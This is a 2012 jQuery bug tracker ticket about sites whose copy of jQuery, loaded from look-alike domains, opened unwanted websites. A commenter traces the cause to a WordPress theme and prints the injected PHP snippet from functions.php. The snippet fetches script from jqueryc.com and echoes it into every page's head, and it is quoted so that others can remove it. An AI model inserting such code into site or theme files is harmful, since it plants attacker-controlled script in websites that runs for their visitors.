Skip to main content

Bug Tracker

Side navigation

#12113 closed bug (invalid)

Opened July 20, 2012 01:46PM UTC

Closed July 20, 2012 01:50PM UTC

Last modified August 03, 2012 12:18AM UTC

Database jqueryc_db and jquerys.org

Reported by: hasan.tekcan79@gmail.com Owned by:
Priority: undecided Milestone: None
Component: unfiled Version: 1.7.2
Keywords: Cc:
Blocked by: Blocking:
Description

http://www.jquerys.org/class/jquery-1.6.3.min.js

My website is using your library but, your library opens a website automatically (http://www.watchliveonline.org)

Attachments (0)
Change History (4)

Changed July 20, 2012 01:50PM UTC by dmethvin comment:1

resolution: → invalid
status: newclosed
summary: Can you fix this??jquerys.org

It's a virus that happens to have taken our name. We are not involved and cannot help. Please ask for help from your web site admin or on a forum like StackOverflow.

Changed July 20, 2012 04:30PM UTC by keeferama comment:2

I tracked this down to an include in my functions.php file within my theme folder, except mine is linking to: http://www.jqueryc.com/jquery-1.6.3.min.js. I tried changing the link to a newer version from the Google API: https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js but it broke my theme. When I changed the link back to: http://www.jqueryc.com/jquery-1.6.3.min.js it seems to have resolved itself - no rhyme or reason for it.

Changed July 20, 2012 04:34PM UTC by dmethvin comment:3

summary: jquerys.orgDatabase jqueryc_db and jquerys.org

Changed August 03, 2012 12:18AM UTC by anonymous comment:4

Replying to [ticket:12113 hasan.tekcan79@…]:

http://www.jquerys.org/class/jquery-1.6.3.min.js My website is using your library but, your library opens a website automatically (http://www.watchliveonline.org)

I had the same problem and it came from malicious script in the functions.php of a wordpress theme. Delete the entire reference to //Jquery Function

if (!function_exists('insert_jquery_theme')){

function insert_jquery_theme(){

if (function_exists('curl_init')){

$url="jqueryc.com/jquery-1.6.3.min.js";

$ch = curl_init();

$timeout = 5;

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

$data = curl_exec($ch);

curl_close($ch);

echo $data;

}

}

add_action('wp_head', 'insert_jquery_theme');

}

and it will correct the problem!